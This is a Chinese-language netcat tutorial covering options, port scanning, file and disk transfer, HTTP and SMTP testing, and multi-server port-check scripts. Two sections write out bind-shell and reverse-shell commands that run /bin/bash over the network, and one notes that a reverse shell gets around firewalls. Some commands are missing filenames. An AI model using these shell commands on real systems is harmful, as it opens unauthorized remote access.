nc测试端⼝命令
Linux命令--nc (测试服务器端⼝是否打开)
##参数
想要连接到某处:  nc [-options] hostname port[s] [ports] …
绑定端⼝等待连接:  nc -l port [-options] [hostname] [port]
-g<⽹关>:设置路由器跃程通信⽹关,最多设置8个;
telnet ip 端口号-G<;指向器数⽬>:设置来源路由指向器,其数值为4的倍数;
-h:在线帮助;
-i<;延迟秒数>:设置时间间隔,以便传送信息及扫描通信端⼝;
-l:使⽤监听模式,监控传⼊的资料;
-n:直接使⽤ip地址,⽽不通过域名服务器;
-
o<;输出⽂件>:指定⽂件名称,把往来传输的数据以16进制字码倾倒成该⽂件保存;
-p<;通信端⼝>:设置本地主机使⽤的通信端⼝;
-r:指定源端⼝和⽬的端⼝都进⾏随机的选择;
-s<;来源位址>:设置本地主机送出数据包的IP地址;
-u:使⽤UDP传输协议;
-v:显⽰指令执⾏过程;
-w<;超时秒数>:设置等待连线的时间;
-z:使⽤0输⼊/输出模式,只在扫描通信端⼝时使⽤。
##⽤法
[A Server(192.168.1.1) B Client(192.168.1.2)]
####0.
连接到远程主机:
$nc -nvv 80
连到的TCP80端⼝.
监听本地主机:
$nc -l 80
监听本机的TCP80端⼝.
超时控制:
多数情况我们不希望连接⼀直保持,那么我们可以使⽤ -w 参数来指定连接的空闲超时时间,该参数紧接⼀个数值,代表秒数,如果连接超过指定时间则连接会被终⽌。
Server
$nc -l 2389
Client
$ nc -w 10 localhost 2389
该连接将在 10 秒后中断。
注意: 不要在服务器端同时使⽤ -w 和 -l 参数,因为 -w 参数将在服务器端⽆效果。
####1.端⼝扫描
端⼝扫描经常被系统管理员和⿊客⽤来发现在⼀些机器上开放的端⼝,帮助他们识别系统中的漏洞。
$nc -z -v -n 192.168.1.1 21-25
可以运⾏在TCP或者UDP模式,默认是TCP,-u参数调整为udp.
z 参数告诉netcat使⽤0 IO,连接成功后⽴即关闭连接,不进⾏数据交换.
v 参数指详细输出.
n 参数告诉netcat 不要使⽤DNS反向查询IP地址的域名.
以上命令会打印21到25 所有开放的端⼝。
$nc -v 127.0.0.1 22localhost [127.0.0.1] 22 (ssh) openSSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
"SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4"为Banner信息。Banner是⼀个⽂本,Banner是⼀个你连接的服务发送给你的⽂本信息。当你试图鉴别漏洞或者服务的类型和版本的时候,Banner信息是⾮常有⽤的。但是,并不是所有的服务都会发送banner.⼀旦你发现开放的端⼝,你可以容易的使⽤netcat 连接服务抓取他们的banner。
####2.Chat Server
假如你想和你的朋友聊聊,有很多的软件和信息服务可以供你使⽤。但是,如果你没有这么奢侈的配置,⽐如你在计算机实验室,所有的对外的连接都是被限制的,你怎样和整天坐在隔壁房间的朋友沟通那?不要郁闷了,netcat提供了这样⼀种⽅法,你只需要创建⼀个Chat服务器,⼀个预先确定好的端⼝,这样⼦他就可以联系到你了。
Server
$nc -l 20000
netcat 命令在20000端⼝启动了⼀个tcp 服务器,所有的标准输出和输⼊会输出到该端⼝。输出和输⼊都在此shell中展⽰。
Client
$nc 192.168.1.1 20000
不管你在机器B上键⼊什么都会出现在机器A上。
####3.⽂件传输
⼤部分时间中,我们都在试图通过⽹络或者其他⼯具传输⽂件。有很多种⽅法,⽐如FTP,SCP,SMB等等,但是当你只是需要临时或者⼀次传输⽂件,真的值得浪费时间来安装配置⼀个软件到你的机器上嘛。假设,你想要传⼀个⽂件 从A 到B。A或者B都可以作为服务器或者客户端.
Server
$nc -l 20000 <
Client
$nc -n 192.168.1.1 20000 >
这⾥我们创建了⼀个服务器在A上并且重定向netcat的输⼊为⽂件,那么当任何成功连接到该端⼝,
netcat会发送file的⽂件内容。
在客户端我们重定向输出到,当B连接到A,A发送⽂件内容,B保存⽂件内容到
没有必要创建⽂件源作为Server,我们也可以相反的⽅法使⽤。像下⾯的我们发送⽂件从B到A,但是服务器创建在A上,这次我们仅需要重定向netcat的输出并且重定向B的输⼊⽂件。
B作为Server
Server
$nc -l 20000 >
Client
$nc 192.168.1.2 20000 <
####4.⽬录传输
发送⼀个⽂件很简单,但是如果我们想要发送多个⽂件,或者整个⽬录,⼀样很简单,只需要使⽤压缩⼯具tar,压缩后发送压缩包。
如果你想要通过⽹络传输⼀个⽬录从A到B。
Server
$tar -cvf – dir_name | nc -l 20000
Client
$nc -n 192.168.1.1 20000 | tar -xvf -
这⾥在A服务器上,我们创建⼀个tar归档包并且通过-在控制台重定向它,然后使⽤管道,重定向给netcat,netcat可以通过⽹络发送它。
在客户端我们下载该压缩包通过netcat 管道然后打开⽂件。
如果想要节省带宽传输压缩包,我们可以使⽤bzip2或者其他⼯具压缩。
Server
$tar -cvf – dir_name| bzip2 -z | nc -l 20000
通过bzip2压缩
Client
$nc -n 192.168.1.1 20000 | bzip2 -d |tar -xvf -
####5. 加密你通过⽹络发送的数据
如果你担⼼你在⽹络上发送数据的安全,你可以在发送你的数据之前⽤如mcrypt的⼯具加密。
Server
$nc localhost 20000 | mcrypt –flush –bare -F -q -d -m ecb >
使⽤mcrypt⼯具加密数据。
Client
$mcrypt –flush –bare -F -q -m ecb < | nc -l 20000
使⽤mcrypt⼯具解密数据。
以上两个命令会提⽰需要密码,确保两端使⽤相同的密码。
这⾥我们是使⽤mcrypt⽤来加密,使⽤其它任意加密⼯具都可以。
####6.流视频
虽然不是⽣成流视频的最好⽅法,但如果服务器上没有特定的⼯具,使⽤netcat,我们仍然有希望做成这件事。
Server
$cat video.avi | nc -l 20000
这⾥我们只是从⼀个视频⽂件中读⼊并重定向输出到netcat客户端
Client
$nc 192.168.1.1 20000 | mplayer -vo x11 -cache 3000 -
这⾥我们从socket中读⼊数据并重定向到mplayer。
####7,克隆⼀个设备
如果你已经安装配置⼀台Linux机器并且需要重复同样的操作对其他的机器,⽽你不想在重复配置⼀遍。不在需要重复配置安装的过程,只启动另⼀台机器的⼀些引导可以随⾝碟和克隆你的机器。
克隆Linux PC很简单,假如你的系统在磁盘/dev/sda上
Server
$dd if=/dev/sda | nc -l 20000
Client
$nc -n 192.168.1.1 20000 | dd of=/dev/sda
dd是⼀个从磁盘读取原始数据的⼯具,我通过netcat服务器重定向它的输出流到其他机器并且写⼊到磁盘中,它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区,我们可以根据我们系统root分区的位置,更改sda 为sda1,sda2.等等。
####8.打开⼀个shell
我们已经⽤过远程shell-使⽤telnet和ssh,但是如果这两个命令没有安装并且我们没有权限安装他们,我们也可以使⽤netcat创建远程shell。
假设你的netcat⽀持 -c -e 参数(原⽣ netcat)
Server
$nc -l 20000 -e /bin/bash -i
Client
$nc 192.168.1.1 20000
这⾥我们已经创建了⼀个netcat服务器并且表⽰当它连接成功时执⾏/bin/bash
假如netcat 不⽀持-c 或者 -e 参数(openbsd netcat),我们仍然能够创建远程shell
Server
$mkfifo /tmp/tmp_fifo$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 20000 > /tmp/tmp_fifo
这⾥我们创建了⼀个fifo⽂件,然后使⽤管道命令把这个fifo⽂件内容定向到shell 2>&1中。是⽤来重定向标准错误输出和标准输出,然后管道到netcat 运⾏的端⼝20000上。⾄
此,我们已经把netcat的输出重定向到fifo⽂件中。
说明:
从⽹络收到的输⼊写到fifo⽂件中
cat 命令读取fifo⽂件并且其内容发送给sh命令
sh命令进程受到输⼊并把它写回到netcat。
netcat 通过⽹络发送输出到client
⾄于为什么会成功是因为管道使命令平⾏执⾏,fifo⽂件⽤来替代正常⽂件,因为fifo使读取等待⽽如果是⼀个普通⽂件,cat命令会尽快结束并开始读取空⽂件。
在客户端仅仅简单连接到服务器
Client
$nc -n 192.168.1.1 20000
你会得到⼀个shell提⽰符在客户端
####9.反向shell
反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这⾥服务器使⽤的是由客户提供的服务。
Server
$nc -l 20000
在客户端,简单地告诉netcat在连接完成后,执⾏shell。
Client
$nc 192.168.1.1 20000 -e /bin/bash
现在,什么是反向shell的特别之处呢
反向shell经常被⽤来绕过防⽕墙的限制,如阻⽌⼊站连接。例如,我有⼀个专⽤IP地址为192.168.1.1,我使⽤代理服务器连接到外部⽹络。如果我想从⽹络外部访问这台机器
如1.2.3.4的shell,那么我会⽤反向外壳⽤于这⼀⽬的。
####10.指定源端⼝
假设你的防⽕墙过滤除25端⼝外其它所有端⼝,你需要使⽤-p选项指定源端⼝。
Server
$nc -l 20000
Client
$nc 192.168.1.1 20000 25
使⽤1024以内的端⼝需要root权限。
该命令将在客户端开启25端⼝⽤于通讯,否则将使⽤随机端⼝。
####11.指定源地址
假设你的机器有多个地址,希望明确指定使⽤哪个地址⽤于外部数据通讯。我们可以在netcat中使⽤-s选项指定ip地址。
Server
$nc -u -l 20000 <
Client
$nc -u 192.168.1.1 20000 -s 172.31.100.5 >
该命令将绑定地址172.31.100.5。
####12.静态web页⾯服务器
新建⼀个⽹页,命名为somepage.html;
新建⼀个shell script:
while true; do
nc -l 80 -q 1 < somepage.html;done
⽤root权限执⾏,然后在浏览器中输⼊127.0.0.1打开看看是否正确运⾏。
nc 指令通常都是給管理者進⾏除錯或測試等動作⽤的,所以如果只是單純需要臨時的網⾴伺服器,使⽤ Python 的 SimpleHTTPServer 模組會⽐較⽅便。
####13.模拟HTTP Headers
$nc www.huanxiangwu 80GET / HTTP/1.1Host: Referrer: mypage
User-Agent: my-browser
HTTP/1.1 200 OKDate: Tue, 16 Dec 2008 07:23:24 GMTServer: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/Expires: 0Cac Cache-Control: private, post-check=0, pre-check=0, max-age=0Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html
[......]
在nc命令后,输⼊红⾊部分的内容,然后按两次回车,即可从对⽅获得HTTP Headers内容。####13.Netcat⽀持IPv6
netcat 的 -4 和 -6 参数⽤来指定 IP 地址类型,分别是 IPv4 和 IPv6:
Server
$ nc -4 -l 2389
Client
$ nc -4 localhost 2389
然后我们可以使⽤ netstat 命令来查看⽹络的情况:
$ netstat | grep 2389tcp        0      0 localhost:2389          localhost:50851        ESTABLISHED
tcp        0      0 localhost:50851        localhost:2389          ESTABLISHED
接下来我们看看IPv6 的情况:
Server
$ nc -6 -l 2389
Client
$ nc -6 localhost 2389
再次运⾏ netstat 命令:
$ netstat | grep 2389tcp6      0      0 localhost:2389          localhost:33234        ESTABLISHED
tcp6      0      0 localhost:33234        localhost:2389          ESTABLISHED
前缀是 tcp6 表⽰使⽤的是 IPv6 的地址。
####14.在 Netcat 中禁⽌从标准输⼊中读取数据
该功能使⽤ -d 参数,请看下⾯例⼦:
Server
$ nc -l 2389
Client
$ nc -d localhost 2389
Hi
你输⼊的 Hi ⽂本并不会送到服务器端。
####15.强制 Netcat 服务器端保持启动状态
如果连接到服务器的客户端断开连接,那么服务器端也会跟着退出。
Server
$ nc -l 2389
Client
$ nc localhost 2389^C
Server
$ nc -l 2389
$
上述例⼦中,但客户端断开时服务器端也⽴即退出。
我们可以通过 -k 参数来控制让服务器不会因为客户端的断开连接⽽退出。
Server
$ nc -k -l 2389
Client
$ nc localhost 2389^C
Server
$ nc -k -l 2389
####16.配置 Netcat 客户端不会因为 EOF ⽽退出
Netcat 客户端可以通过 -q 参数来控制接收到 EOF 后隔多长时间才退出,该参数的单位是秒:Client
$nc  -q 5  localhost 2389
现在如果客户端接收到 EOF ,它将等待 5 秒后退出。
####17.⼿動使⽤ SMTP 協定寄信
在測試郵件伺服器是否正常時,可以使⽤這樣的⽅式⼿動寄送 Email:
$nc localhost 25 << EOF
ample
MAIL FROM: <ample>
RCPT TO: <ample>
DATA
Body of email.
.
QUIT
EOF
####18.透過代理伺服器(Proxy)連線
這指令會使⽤ 10.2.3.4:8080 這個代理伺服器,連線⾄ ample 的42端⼝。
$nc -x10.2.3.4:8080 -ample 42
####19.使⽤ Unix Domain Socket
這⾏指令會建⽴⼀個 Unix Domain Socket,並接收資料:
$nc -lU /var/tmp/dsocket
如何使⽤ Shell 脚本来查看多个服务器的端⼝是否打开?
我们在进⾏服务器配置的时候,经常要查看服务器的某个端⼝是否已经开放。如果服务器只有⼀两台的话,那很好办,只需要使⽤ nc 命令⼀个个查看即可。
但是,如果你的服务器是个集,有很多台呢?那如果还⼀个个⼿动去检查的话,效率肯定是⽆⽐低下的,年底裁员名单⾥肯定有你。
在这种情况下,我们完全可以使⽤ Shell 脚本配合 nc 命令来达到我们的⽬的。⽽且,不管服务器有⼏台,需要检查的端⼝有⼏个,都可以实现这样的⽬标。
在本⽂⾥,我们⽤ Shell 脚本来实现两个需求:
扫描多台服务器的⼀个端⼝是否打开
扫描多台服务器的多个端⼝是否打开
在开始之前,我们先来了解⼀下 nc 命令。
nc 命令简介
nc 是英⽂单词 netcat 的缩写,它是通过使⽤ TCP 或 UDP 的⽹络协议的连接来读或写数据,可以直接被第三⽅程序或脚本直接调⽤。
同时,它是⼀款功能⾮常强⼤的⽹络调试⼯具,因为它可以创建⼏乎所有你所需要的连接⽅式。
nc ⼯具主要有三种功能模式:连接模式、监听模式、通道模式。它的⼀般使⽤格式如下:
$ nc [-options] [HostName or IP] [PortNumber]
接下来,我们就⽤ Shell 脚本结合 nc 命令来实现我们的两个需求。
1. 扫描多台服务器的⼀个端⼝是否打开
在这⾥,我们先把需要查询的所有服务器地址全部放在⼀个 ⽂件⾥,每个地址单独⼀⾏,如下:
#
192.168.1.2
192.168.1.3
192.168.1.4
192.168.1.5
192.168.1.6
192.168.1.7
然后,我们再⽤ for 循环依次扫描 ⾥对应服务器的端⼝是否打开。在这⾥,我们扫描 22 端⼝是否打开。
# vi port_scan.sh
#!/bin/sh
for server in ``
do
#echo $i
nc -zvw3 $server 22
done
最后,我们给这个脚本赋予可执⾏权限即可。
$ chmod +x port_scan.sh
之后,我们就可以⽤这个脚本来⾃动依次检查多个服务器的 22 端⼝是否已打开。
# sh port_scan.sh
Connection to 192.168.1.2 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.3 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.4 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.5 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.6 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.7 22 port [tcp/ssh] succeeded!
2. 扫描多台服务器的多个端⼝是否打开
在这⾥,我们同样把需要查询的所有服务器地址全部放在⼀个 ⽂件⾥,每个地址单独⼀⾏。这⾥就不重复演⽰了。
与此同时,我们也把需要查询的服务器端⼝放在另⼀个 ⽂件⾥,每个端⼝单独⼀⾏,如下所⽰:
#
22
80
然后,我们再⽤ for 循环依次扫描 ⾥对应服务器 所列的端⼝是否打开。注意,这⾥⽤到了两个 for 循环,第⼀层是服务器列表,第⼆层是端⼝列表。# vi multiple_port_scan.sh
#!/bin/sh
for server in ``
do
for port in ``
do
#echo $server
nc -zvw3 $server $port
echo ""
done
done
最后,我们给这个脚本赋予可执⾏权限即可。
$ chmod +x multiple_port_scan.sh
之后,我们就可以⽤这个脚本来⾃动依次检查多个服务器的多个端⼝是否已打开。
# sh multiple_port_scan.sh
Connection to 192.168.1.2 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.2 80 port [tcp/http] succeeded!
Connection to 192.168.1.3 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.3 80 port [tcp/http] succeeded!
Connection to 192.168.1.4 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.4 80 port [tcp/http] succeeded!
Connection to 192.168.1.5 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.5 80 port [tcp/http] succeeded!
Connection to 192.168.1.6 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.6 80 port [tcp/http] succeeded!
Connection to 192.168.1.7 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.7 80 port [tcp/http] succeeded!

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。